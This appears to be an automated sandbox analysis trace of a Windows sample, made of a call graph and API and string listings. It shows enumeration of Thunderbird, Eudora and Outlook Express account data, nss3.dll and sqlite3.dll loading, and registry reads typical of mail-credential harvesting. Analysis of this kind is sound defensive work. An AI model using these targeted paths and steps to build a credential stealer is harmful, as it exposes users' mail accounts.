33799 406d1a CreateFileA 33224->33799 33227 40b01c 33225->33227 33228 40b035 33227->33228 33229 40b12d 33227->33229 33800 406c62 LoadCursorA SetCursor 33228->33800 33804 406d77 9 API calls 33229->33804 33232 40b136 33243 40c580 28 API calls 33232->33243 33233 40b087 33240 40b0a1 33233->33240 33802 40a699 12 API calls 33233->33802 33234 40b042 33234->33233 33234->33240 33801 40a57c strlen WriteFile 33234->33801 33237 40b0d6 33238 40b116 CloseHandle 33237->33238 33239 40b11f SetCursor 33237->33239 33238->33239 33239->33232 33240->33237 33803 406d77 9 API calls 33240->33803 33242->33071 33243->33075 33256 409a32 33244->33256 33247 409c80 memcpy memcpy 33252 409cda 33247->33252 33248 409d18 ??2@YAPAXI ??2@YAPAXI 33250 409d54 ??2@YAPAXI 33248->33250 33253 409d8b 33248->33253 33249 408db6 12 API calls 33249->33252 33250->33253 33252->33247 33252->33248 33252->33249 33253->33253 33266 409b9c 33253->33266 33255 4023c1 33255->33156 33257 409a44 33256->33257 33258 409a3d ??3@YAXPAX 33256->33258 33259 409a52 33257->33259 33260 409a4b ??3@YAXPAX 33257->33260 33258->33257 33261 409a63 33259->33261 33262 409a5c ??3@YAXPAX 33259->33262 33260->33259 33263 409a83 ??2@YAPAXI ??2@YAPAXI 33261->33263 33264 409a73 ??3@YAXPAX 33261->33264 33265 409a7c ??3@YAXPAX 33261->33265 33262->33261 33263->33247 33264->33265 33265->33263 33267 407a55 ??3@YAXPAX 33266->33267 33268 409ba5 33267->33268 33269 407a55 ??3@YAXPAX 33268->33269 33270 409bad 33269->33270 33271 407a55 ??3@YAXPAX 33270->33271 33272 409bb5 33271->33272 33273 407a55 ??3@YAXPAX 33272->33273 33274 409bbd 33273->33274 33275 407a1f 4 API calls 33274->33275 33276 409bd0 33275->33276 33277 407a1f 4 API calls 33276->33277 33278 409bda 33277->33278 33279 407a1f 4 API calls 33278->33279 33280 409be4 33279->33280 33281 407a1f 4 API calls 33280->33281 33282 409bee 33281->33282 33282->33255 33284 410d0e 2 API calls 33283->33284 33285 410dca 33284->33285 33286 410dfd memset 33285->33286 33325 4070ae 33285->33325 33287 410e1d 33286->33287 33328 410a9c RegOpenKeyExA 33287->33328 33291 401e9e strlen strlen 33291->33159 33291->33160 33292 410e4a 33293 410e7f _mbscpy 33292->33293 33329 410d3d _mbscpy 33292->33329 33293->33291 33295 410e5b 33330 410add RegQueryValueExA 33295->33330 33297 410e73 RegCloseKey 33297->33293 33298->33163 33299->33169 33331 410a9c RegOpenKeyExA 33300->33331 33302 401c4c 33303 401cad 33302->33303 33332 410add RegQueryValueExA 33302->33332 33303->33172 33303->33174 33305 401c6a 33306 401c71 strchr 33305->33306 33307 401ca4 RegCloseKey 33305->33307 33306->33307 33308 401c85 strchr 33306->33308 33307->33303 33308->33307 33309 401c94 33308->33309 33333 406f06 strlen 33309->33333 33311 401ca1 33311->33307 33312->33175 33313->33160 33314->33166 33315->33192 33336 410a9c RegOpenKeyExA 33316->33336 33318 410b34 33319 410b5d 33318->33319 33337 410add RegQueryValueExA 33318->33337 33319->33192 33321 410b4c RegCloseKey 33321->33319 33323->33192 33324->33180 33326 4070bd GetVersionExA 33325->33326 33327 4070ce 33325->33327 33326->33327 33327->33286 33327->33291 33328->33292 33329->33295 33330->33297 33331->33302 33332->33305 33334 406f17 33333->33334 33335 406f1a memcpy 33333->33335 33334->33335 33335->33311 33336->33318 33337->33321 33339 409b40 33338->33339 33341 409b4e 33338->33341 33346 409901 memset SendMessageA 33339->33346 33342 409b99 33341->33342 33343 409b8b 33341->33343 33342->33204 33347 409868 SendMessageA 33343->33347 33345->33200 33346->33341 33347->33342 33348->33207 33350 404785 FreeLibrary 33349->33350 33351 40473b LoadLibraryA 33350->33351 33352 40474c GetProcAddress 33351->33352 33353 40476e 33351->33353 33352->33353 33354 404764 33352->33354 33355 404781 33353->33355 33356 404785 FreeLibrary 33353->33356 33354->33353 33355->33210 33356->33355 33358 4107f1 FreeLibrary 33357->33358 33359 403c30 LoadLibraryA 33358->33359 33360 403c74 33359->33360 33361 403c44 GetProcAddress 33359->33361 33362 4107f1 FreeLibrary 33360->33362 33361->33360 33363 403c5e 33361->33363 33364 403c7b 33362->33364 33363->33360 33366 403c6b 33363->33366 33365 404734 3 API calls 33364->33365 33367 403c86 33365->33367 33366->33364 33441 4036e5 33367->33441 33370 4036e5 26 API calls 33371 403c9a 33370->33371 33372 4036e5 26 API calls 33371->33372 33373 403ca4 33372->33373 33374 4036e5 26 API calls 33373->33374 33375 403cae 33374->33375 33453 4085d2 33375->33453 33383 403ce5 33384 403cf7 33383->33384 33634 402bd1 39 API calls 33383->33634 33499 410a9c RegOpenKeyExA 33384->33499 33387 403d0a 33388 403d1c 33387->33388 33635 402bd1 39 API calls 33387->33635 33500 402c5d 33388->33500 33392 4070ae GetVersionExA 33393 403d31 33392->33393 33518 410a9c RegOpenKeyExA 33393->33518 33395 403d51 33396 403d61 33395->33396 33636 402b22 46 API calls 33395->33636 33519 410a9c RegOpenKeyExA 33396->33519 33399 403d87 33400 403d97 33399->33400 33637 402b22 46 API calls 33399->33637 33520 410a9c RegOpenKeyExA 33400->33520 33403 403dbd 33404 403dcd 33403->33404 33638 402b22 46 API calls 33403->33638 33521 410808 33404->33521 33408 404785 FreeLibrary 33409 403de8 33408->33409 33525 402fdb 33409->33525 33412 402fdb 34 API calls 33413 403e00 33412->33413 33541 4032b7 33413->33541 33422 403e3b 33424 403e73 33422->33424 33425 403e46 _mbscpy 33422->33425 33588 40fb00 33424->33588 33640 40f334 334 API calls 33425->33640 33434 4047a3 33433->33434 33435 404799 FreeLibrary 33433->33435 33434->33210 33435->33434 33436->33210 33438 410807 33437->33438 33439 4107fc FreeLibrary 33437->33439 33438->33210 33439->33438 33440->33209 33442 4037c5 33441->33442 33443 4036fb 33441->33443 33442->33370 33641 410863 UuidFromStringA UuidFromStringA memcpy 33443->33641 33445 40370e 33445->33442 33446 403716 strchr 33445->33446 33446->33442 33447 403730 33446->33447 33642 4021b6 memset 33447->33642 33449 40373f _mbscpy _mbscpy strlen 33450 4037a4 _mbscpy 33449->33450 33451 403789 sprintf 33449->33451 33643 4023e5 16 API calls 33450->33643 33451->33450 33454 4085e2 33453->33454 33644 4082cd 11 API calls 33454->33644 33458 408600 33459 403cba 33458->33459 33460 40860b memset 33458->33460 33471 40821d 33459->33471 33647 410b62 RegEnumKeyExA 33460->33647 33462 4086d2 RegCloseKey 33462->33459 33464 408637 33464->33462 33465 40865c memset 33464->33465 33648 410a9c RegOpenKeyExA 33464->33648 33651 410b62 RegEnumKeyExA 33464->33651 33649 410add RegQueryValueExA 33465->33649 33468 408694 33650 40848b 10 API calls 33468->33650 33470 4086ab RegCloseKey 33470->33464 33652 410a9c RegOpenKeyExA 33471->33652 33473 40823f 33474 403cc6 33473->33474 33475 408246 memset 33473->33475 33483 4086e0 33474->33483 33653 410b62 RegEnumKeyExA 33475->33653 33477 4082bf RegCloseKey 33477->33474 33479 40826f 33479->33477 33654 410a9c RegOpenKeyExA 33479->33654 33655 4080ed 11 API calls 33479->33655 33656 410b62 RegEnumKeyExA 33479->33656 33482 4082a2 RegCloseKey 33482->33479 33657 4045db 33483->33657 33485 4088ef 33665 404656 33485->33665 33489 408737 wcslen 33489->33485 33492 40876a 33489->33492 33490 40877a _wcsncoll 33490->33492 33492->33485 33492->33490 33493 404734 3 API calls 33492->33493 33494 404785 FreeLibrary 33492->33494 33495 408812 memset 33492->33495 33496 40883c memcpy wcschr 33492->33496 33497 4088c3 LocalFree 33492->33497 33668 40466b _mbscpy 33492->33668 33493->33492 33494->33492 33495->33492 33495->33496 33496->33492 33497->33492 33498 410a9c RegOpenKeyExA 33498->33383 33499->33387 33669 410a9c RegOpenKeyExA 33500->33669 33502 402c7a 33503 402da5 33502->33503 33504 402c87 memset 33502->33504 33503->33392 33670 410b62 RegEnumKeyExA 33504->33670 33506 402d9c RegCloseKey 33506->33503 33507 410b1e 3 API calls 33508 402ce4 memset sprintf 33507->33508 33671 410a9c RegOpenKeyExA 33508->33671 33510 402d28 33511 402d3a sprintf 33510->33511 33672 402bd1 39 API calls 33510->33672 33673 410a9c RegOpenKeyExA 33511->33673 33516 402cb2 33516->33506 33516->33507 33517 402d9a 33516->33517 33674 402bd1 39 API calls 33516->33674 33675 410b62 RegEnumKeyExA 33516->33675 33517->33506 33518->33395 33519->33399 33520->33403 33522 410816 33521->33522 33523 4107f1 FreeLibrary 33522->33523 33524 403ddd 33523->33524 33524->33408 33676 410a9c RegOpenKeyExA 33525->33676 33527 402ff9 33528 403006 memset 33527->33528 33529 40312c 33527->33529 33677 410b62 RegEnumKeyExA 33528->33677 33529->33412 33531 403033 33532 403122 RegCloseKey 33531->33532 33533 410b1e 3 API calls 33531->33533 33536 4030a2 memset 33531->33536 33538 410b62 RegEnumKeyExA 33531->33538 33539 4030f9 RegCloseKey 33531->33539 33680 402db3 26 API calls 33531->33680 33532->33529 33534 403058 memset sprintf 33533->33534 33678 410a9c RegOpenKeyExA 33534->33678 33679 410b62 RegEnumKeyExA 33536->33679 33538->33531 33539->33531 33542 4032d5 33541->33542 33543 4033a9 33541->33543 33681 4021b6 memset 33542->33681 33556 4034e4 memset memset 33543->33556 33545 4032e1 33682 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33545->33682 33547 4032ea 33548 4032f8 memset GetPrivateProfileSectionA 33547->33548 33683 4023e5 16 API calls 33547->33683 33548->33543 33553 40332f 33548->33553 33550 40339b strlen 33550->33543 33550->33553 33552 403350 strchr 33552->33553 33553->33543 33553->33550 33684 4021b6 memset 33553->33684 33685 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33553->33685 33686 4023e5 16 API calls 33553->33686 33557 410b1e 3 API calls 33556->33557 33558 40353f 33557->33558 33559 40357f 33558->33559 33560 403546 _mbscpy 33558->33560 33564 403985 33559->33564 33687 406d55 strlen _mbscat 33560->33687 33562 403565 _mbscat 33688 4033f0 19 API calls 33562->33688 33689 40466b _mbscpy 33564->33689 33568 4039aa 33570 4039ff 33568->33570 33690 40f460 memset memset 33568->33690 33711 40f6e2 33568->33711 33727 4038e8 21 API calls 33568->33727 33571 404785 FreeLibrary 33570->33571 33572 403a0b 33571->33572 33573 4037ca memset memset 33572->33573 33735 444551 memset 33573->33735 33576 4038e2 33576->33422 33639 40f334 334 API calls 33576->33639 33578 40382e 33579 406f06 2 API calls 33578->33579 33580 403843 33579->33580 33581 406f06 2 API calls 33580->33581 33582 403855 strchr 33581->33582 33583 403884 _mbscpy 33582->33583 33584 403897 strlen 33582->33584 33585 4038bf _mbscpy 33583->33585 33584->33585 33586 4038a4 sprintf 33584->33586 33747 4023e5 16 API calls 33585->33747 33586->33585 33589 44b090 33588->33589 33590 40fb10 RegOpenKeyExA 33589->33590 33591 403e7f 33590->33591 33592 40fb3b RegOpenKeyExA 33590->33592 33602 40f96c 33591->33602 33593 40fb55 RegQueryValueExA 33592->33593 33594 40fc2d RegCloseKey 33592->33594 33595 40fc23 RegCloseKey 33593->33595 33596 40fb84 33593->33596 33594->33591 33595->33594 33597 404734 3 API calls 33596->33597 33598 40fb91 33597->33598 33598->33595 33599 40fc19 LocalFree 33598->33599 33600 40fbdd memcpy memcpy 33598->33600 33599->33595 33752 40f802 11 API calls 33600->33752 33603 4070ae GetVersionExA 33602->33603 33604 40f98d 33603->33604 33605 4045db 7 API calls 33604->33605 33609 40f9a9 33605->33609 33606 40fae6 33607 404656 FreeLibrary 33606->33607 33608 403e85 33607->33608 33614 4442ea memset 33608->33614 33609->33606 33610 40fa13 memset WideCharToMultiByte 33609->33610 33610->33609 33611 40fa43 _strnicmp 33610->33611 33611->33609 33612 40fa5b WideCharToMultiByte 33611->33612 33612->33609 33613 40fa88 WideCharToMultiByte 33612->33613 33613->33609 33615 410dbb 9 API calls 33614->33615 33616 444329 33615->33616 33753 40759e strlen strlen 33616->33753 33621 410dbb 9 API calls 33622 444350 33621->33622 33623 40759e 3 API calls 33622->33623 33624 44435a 33623->33624 33625 444212 65 API calls 33624->33625 33626 444366 memset memset 33625->33626 33627 410b1e 3 API calls 33626->33627 33628 4443b9 ExpandEnvironmentStringsA strlen 33627->33628 33629 4443f4 _strcmpi 33628->33629 33630 4443e5 33628->33630 33631 403e91 33629->33631 33632 44440c 33629->33632 33630->33629 33631->33210 33633 444212 65 API calls 33632->33633 33633->33631 33634->33384 33635->33388 33636->33396 33637->33400 33638->33404 33639->33422 33640->33424 33641->33445 33642->33449 33643->33442 33645 40841c 33644->33645 33646 410a9c RegOpenKeyExA 33645->33646 33646->33458 33647->33464 33648->33464 33649->33468 33650->33470 33651->33464 33652->33473 33653->33479 33654->33479 33655->33482 33656->33479 33658 404656 FreeLibrary 33657->33658 33659 4045e3 LoadLibraryA 33658->33659 33660 404651 33659->33660 33661 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33659->33661 33660->33485 33660->33489 33662 40463d 33661->33662 33663 404656 FreeLibrary 33662->33663 33664 404643 33662->33664 33663->33660 33664->33660 33666 403cd2 33665->33666 33667 40465c FreeLibrary 33665->33667 33666->33498 33667->33666 33668->33492 33669->33502 33670->33516 33671->33510 33672->33511 33673->33516 33674->33516 33675->33516 33676->33527 33677->33531 33678->33531 33679->33531 33680->33531 33681->33545 33682->33547 33683->33548 33684->33552 33685->33553 33686->33553 33687->33562 33688->33559 33689->33568 33728 4078ba 33690->33728 33693 4078ba _mbsnbcat 33694 40f5a3 RegOpenKeyExA 33693->33694 33695 40f5c3 RegQueryValueExA 33694->33695 33696 40f6d9 33694->33696 33697 40f6d0 RegCloseKey 33695->33697 33698 40f5f0 33695->33698 33696->33568 33697->33696 33698->33697 33708 40f675 33698->33708 33732 40466b _mbscpy 33698->33732 33700 40f611 33702 404734 3 API calls 33700->33702 33707 40f616 33702->33707 33703 40f69e RegQueryValueExA 33703->33697 33704 40f6c1 33703->33704 33704->33697 33705 40f66a 33706 404785 FreeLibrary 33705->33706 33706->33708 33707->33705 33709 40f661 LocalFree 33707->33709 33710 40f645 memcpy 33707->33710 33708->33697 33733 4012ee strlen 33708->33733 33709->33705 33710->33709 33734 40466b _mbscpy 33711->33734 33713 40f6fa 33714 4045db 7 API calls 33713->33714 33715 40f708 33714->33715 33716 404734 3 API calls 33715->33716 33722 40f7e2 33715->33722 33718 40f715 33716->33718 33717 404656 FreeLibrary 33719 40f7f1 33717->33719 33718->33722 33723 40f797 WideCharToMultiByte 33718->33723 33720 404785 FreeLibrary 33719->33720 33721 40f7fc 33720->33721 33721->33568 33722->33717 33724 40f7b8 strlen 33723->33724 33725 40f7d9 LocalFree 33723->33725 33724->33725 33726 40f7c8 _mbscpy 33724->33726 33725->33722 33726->33725 33727->33568 33729 4078e6 33728->33729 33730 4078c7 _mbsnbcat 33729->33730 33731 4078ea 33729->33731 33730->33729 33731->33693 33732->33700 33733->33703 33734->33713 33748 410a9c RegOpenKeyExA 33735->33748 33737 40381a 33737->33576 33746 4021b6 memset 33737->33746 33738 44458b 33738->33737 33749 410add RegQueryValueExA 33738->33749 33740 4445a4 33741 4445dc RegCloseKey 33740->33741 33750 410add RegQueryValueExA 33740->33750 33741->33737 33743 4445c1 33743->33741 33751 444879 30 API calls 33743->33751 33745 4445da 33745->33741 33746->33578 33747->33576 33748->33738 33749->33740 33750->33743 33751->33745 33752->33599 33754 4075c9 33753->33754 33755 4075bb _mbscat 33753->33755 33756 444212 33754->33756 33755->33754 33773 407e9d 33756->33773 33759 44424d 33760 444274 33759->33760 33762 444258 33759->33762 33781 407ef8 33759->33781 33761 407e9d 9 API calls 33760->33761 33770 4442a0 33761->33770 33794 444196 52 API calls 33762->33794 33764 407ef8 9 API calls 33764->33770 33765 4442ce 33791 407f90 33765->33791 33769 407f90 FindClose 33771 4442e4 33769->33771 33770->33764 33770->33765 33772 444212 65 API calls 33770->33772 33795 407e62 strcmp strcmp 33770->33795 33771->33621 33772->33770 33774 407f90 FindClose 33773->33774 33775 407eaa 33774->33775 33776 406f06 2 API calls 33775->33776 33777 407ebd strlen strlen 33776->33777 33778 407ee1 33777->33778 33780 407eea 33777->33780 33796 4070e3 strlen _mbscat _mbscpy _mbscat 33778->33796 33780->33759 33782 407f03 FindFirstFileA 33781->33782 33783 407f24 FindNextFileA 33781->33783 33784 407f3f 33782->33784 33785 407f46 strlen strlen 33783->33785 33786 407f3a 33783->33786 33784->33785 33788 407f7f 33784->33788 33785->33788 33789 407f76 33785->33789 33787 407f90 FindClose 33786->33787 33787->33784 33788->33759 33797 4070e3 strlen _mbscat _mbscpy _mbscat 33789->33797 33792 407fa3 33791->33792 33793 407f99 FindClose 33791->33793 33792->33769 33793->33792 33794->33759 33795->33770 33796->33780 33797->33788 33798->33223 33799->33227 33800->33234 33801->33233 33802->33240 33803->33237 33804->33232 33813 411853 RtlInitializeCriticalSection memset 33814 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 33987 40a256 13 API calls 33989 432e5b 17 API calls 33991 43fa5a 20 API calls 33816 401060 41 API calls 33994 427260 CloseHandle memset memset 32916 410c68 FindResourceA 32917 410c81 SizeofResource 32916->32917 32920 410cae 32916->32920 32918 410c92 LoadResource 32917->32918 32917->32920 32919 410ca0 LockResource 32918->32919 32918->32920 32919->32920 33996 405e69 14 API calls 33821 433068 15 API calls __fprintf_l 33998 414a6d 18 API calls 33999 43fe6f 134 API calls 33823 424c6d 15 API calls __fprintf_l 34000 426741 19 API calls 33825 440c70 17 API calls 33826 443c71 44 API calls 33829 427c79 24 API calls 34003 416e7e memset __fprintf_l 33833 42800b 47 API calls 33834 425115 82 API calls __fprintf_l 34006 41960c 61 API calls 33835 43f40c 122 API calls __fprintf_l 33838 411814 InterlockedCompareExchange RtlDeleteCriticalSection 33839 43f81a 20 API calls 33841 414c20 memset memset 33842 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34010 414625 18 API calls 34011 404225 modf 34012 403a26 strlen WriteFile 34014 40422a 12 API calls 34018 427632 memset memset memcpy 34019 40ca30 59 API calls 32903 44b435 VirtualProtect 32904 44b444 VirtualProtect 32903->32904 32905 44b454 32903->32905 32904->32905 34020 404235 26 API calls 33844 425115 76 API calls __fprintf_l 34021 425115 77 API calls __fprintf_l 34023 44223a 38 API calls 33850 43183c 112 API calls 34024 44b2c5 _onexit __dllonexit 34029 42a6d2 memcpy __allrem 33852 405cda 65 API calls 34037 43fedc 138 API calls 34038 4116e1 16 API calls __fprintf_l 33855 4244e6 19 API calls 33857 42e8e8 127 API calls __fprintf_l 33858 4118ee RtlLeaveCriticalSection 34043 43f6ec 22 API calls 33860 425115 119 API calls __fprintf_l 32906 410cf3 EnumResourceNamesA 34046 4492f0 memcpy memcpy 34048 43fafa 18 API calls 34050 4342f9 15 API calls __fprintf_l 33861 4144fd 19 API calls 34052 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34053 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34056 443a84 _mbscpy 34058 43f681 17 API calls 33864 404487 22 API calls 34060 415e8c 16 API calls __fprintf_l 33868 411893 RtlDeleteCriticalSection __fprintf_l 33869 41a492 42 API calls 34064 403e96 34 API calls 34065 410e98 memset SHGetPathFromIDList SendMessageA 33871 426741 109 API calls __fprintf_l 33872 4344a2 18 API calls 33873 4094a2 10 API calls 34068 4116a6 15 API calls __fprintf_l 34069 43f6a4 17 API calls 34070 440aa3 20 API calls 34072 427430 45 API calls 33876 4090b0 7 API calls 33877 4148b0 15 API calls 33879 4118b4 RtlEnterCriticalSection 33880 4014b7 CreateWindowExA 33881 40c8b8 19 API calls 33883 4118bf RtlTryEnterCriticalSection 34077 42434a 18 API calls __fprintf_l 34079 405f53 12 API calls 33891 43f956 59 API calls 33893 40955a 17 API calls 33894 428561 36 API calls 33895 409164 7 API calls 34083 404366 19 API calls 34087 40176c ExitProcess 34090 410777 42 API calls 33900 40dd7b 51 API calls 33901 425d7c 16 API calls __fprintf_l 34092 43f6f0 25 API calls 34093 42db01 22 API calls 33902 412905 15 API calls __fprintf_l 34094 403b04 54 API calls 34095 405f04 SetDlgItemTextA GetDlgItemTextA 34096 44b301 ??3@YAXPAX 34099 4120ea 14 API calls 3 library calls 34100 40bb0a 8 API calls 34102 413f11 strcmp 33906 434110 17 API calls __fprintf_l 33908 425115 108 API calls __fprintf_l 34103 444b11 _onexit 33910 425115 76 API calls __fprintf_l 33913 429d19 10 API calls 34106 444b1f __dllonexit 34107 409f20 _strcmpi 33915 42b927 31 API calls 34110 433f26 19 API calls __fprintf_l 34111 44b323 FreeLibrary 34112 427f25 46 API calls 34113 43ff2b 17 API calls 34114 43fb30 19 API calls 33922 414d36 16 API calls 33924 40ad38 7 API calls 34116 433b38 16 API calls __fprintf_l 34117 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 33928 426741 21 API calls 33929 40c5c3 125 API calls 33931 43fdc5 17 API calls 34118 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 33934 4161cb memcpy memcpy memcpy memcpy 34123 43ffc8 18 API calls 33935 4281cc 15 API calls __fprintf_l 34125 4383cc 110 API calls __fprintf_l 33936 4275d3 41 API calls 34126 4153d3 22 API calls __fprintf_l 33937 444dd7 _XcptFilter 34131 4013de 15 API calls 34133 425115 111 API calls __fprintf_l 34134 43f7db 18 API calls 34137 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 33940 4335ee 16 API calls __fprintf_l 34139 429fef 11 API calls 33941 444deb _exit _c_exit 34140 40bbf0 138 API calls 33944 425115 79 API calls __fprintf_l 34144 437ffa 22 API calls 33948 4021ff 14 API calls 33949 43f5fc 149 API calls 34145 40e381 9 API calls 33951 405983 40 API calls 33952 42b186 27 API calls __fprintf_l 33953 427d86 76 API calls 33954 403585 20 API calls 33956 42e58e 18 API calls __fprintf_l 33959 425115 75 API calls __fprintf_l 33961 401592 8 API calls 32907 410b92 32910 410a6b 32907->32910 32909 410bb2 32911 410a77 32910->32911 32912 410a89 GetPrivateProfileIntA 32910->32912 32915 410983 memset _itoa WritePrivateProfileStringA 32911->32915 32912->32909 32914 410a84 32914->32909 32915->32914 34149 434395 16 API calls 33963 441d9c memcmp 34151 43f79b 119 API calls 33964 40c599 43 API calls 34152 426741 87 API calls 33968 4401a6 21 API calls 33970 426da6 memcpy memset memset memcpy 33971 4335a5 15 API calls 33973 4299ab memset memset memcpy memset memset 33974 40b1ab 8 API calls 34157 425115 76 API calls __fprintf_l 34161 4113b2 18 API calls 2 library calls 34165 40a3b8 memset sprintf SendMessageA 32921 410bbc 32924 4109cf 32921->32924 32925 4109dc 32924->32925 32926 410a23 memset GetPrivateProfileStringA 32925->32926 32927 4109ea memset 32925->32927 32932 407646 strlen 32926->32932 32937 4075cd sprintf memcpy 32927->32937 32930 410a0c WritePrivateProfileStringA 32931 410a65 32930->32931 32933 40765a 32932->32933 32935 40765c 32932->32935 32933->32931 32934 4076a3 32934->32931 32935->32934 32938 40737c strtoul 32935->32938 32937->32930 32938->32935 33976 40b5bf memset memset _mbsicmp

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                  APIs
                                                  • memset.MSVCRT ref: 0040832F
                                                  • memset.MSVCRT ref: 00408343
                                                  • memset.MSVCRT ref: 0040835F
                                                  • memset.MSVCRT ref: 00408376
                                                  • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                  • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                  • strlen.MSVCRT ref: 004083E9
                                                  • strlen.MSVCRT ref: 004083F8
                                                  • memcpy.MSVCRT ref: 0040840A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                  • String ID: 5$H$O$b$i$}$}
                                                  • API String ID: 1832431107-3760989150
                                                  • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                  • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                  • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                  • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 443 407ef8-407f01 444 407f03-407f22 FindFirstFileA 443->444 445 407f24-407f38 FindNextFileA 443->445 446 407f3f-407f44 444->446 447 407f46-407f74 strlen * 2 445->447 448 407f3a call 407f90 445->448 446->447 450 407f89-407f8f 446->450 451 407f83 447->451 452 407f76-407f81 call 4070e3 447->452 448->446 454 407f86-407f88 451->454 452->454 454->450
                                                  APIs
                                                  • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                  • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                  • strlen.MSVCRT ref: 00407F5C
                                                  • strlen.MSVCRT ref: 00407F64
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FileFindstrlen$FirstNext
                                                  • String ID: ACD
                                                  • API String ID: 379999529-620537770
                                                  • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                  • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                  • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                  • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • memset.MSVCRT ref: 00401E8B
                                                  • strlen.MSVCRT ref: 00401EA4
                                                  • strlen.MSVCRT ref: 00401EB2
                                                  • strlen.MSVCRT ref: 00401EF8
                                                  • strlen.MSVCRT ref: 00401F06
                                                  • memset.MSVCRT ref: 00401FB1
                                                  • atoi.MSVCRT ref: 00401FE0
                                                  • memset.MSVCRT ref: 00402003
                                                  • sprintf.MSVCRT ref: 00402030
                                                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                  • memset.MSVCRT ref: 00402086
                                                  • memset.MSVCRT ref: 0040209B
                                                  • strlen.MSVCRT ref: 004020A1
                                                  • strlen.MSVCRT ref: 004020AF
                                                  • strlen.MSVCRT ref: 004020E2
                                                  • strlen.MSVCRT ref: 004020F0
                                                  • memset.MSVCRT ref: 00402018
                                                    • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                                    • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                  • _mbscpy.MSVCRT ref: 00402177
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                                  • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                    • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                  • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                  • API String ID: 1846531875-4223776976
                                                  • Opcode ID: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                                  • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                  • Opcode Fuzzy Hash: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                                  • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
